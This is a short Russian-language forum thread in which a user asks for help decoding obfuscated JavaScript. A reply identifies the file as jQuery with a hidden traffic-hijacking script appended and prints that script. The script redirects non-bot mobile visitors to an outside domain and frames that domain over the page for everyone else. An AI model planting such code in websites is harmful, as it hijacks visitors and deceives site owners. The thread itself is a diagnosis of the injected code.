раскодировать js

Discussion in 'PHP' started by an1idot, 31 Jan 2013.

  1. an1idot

    an1idot New Member

    Joined:
    7 Jun 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    прошу помочь с раскодированием. возможно за оплату, но приятнее было бы бесплатно.
    http://zalil.ru/34217685
     
    #1 an1idot, 31 Jan 2013
    Last edited: 31 Jan 2013
  2. sova1611

    sova1611 New Member

    Joined:
    10 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    обычный jQuery только в конце дописано
    HTML:
    if(navigator.userAgent.match(/(yandex|google|bot)/i)==null)
    	{
    	if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|windows phone)/i)!==null)
    		{
    		window.location="http://miage.ru/go2.php?mobi=true"
    	}
    	else
    		{
    		document.write('<frameset frameborder=0 framespacing=0 border=0 rows="100%,*" noresize><frame name="sor" src="http://miage.ru/go2.php" noresize></frameset>');
    		//parent.window.opener.location="http://"+document.domain+"/index.php"
    	}
    }
    редерект мобильного трафа и слив фрем трафа
     
    #2 sova1611, 31 Jan 2013
    Last edited: 31 Jan 2013
  3. an1idot

    an1idot New Member

    Joined:
    7 Jun 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    я знаю что делает эта часть кода. меня интересует та часть, что закодирована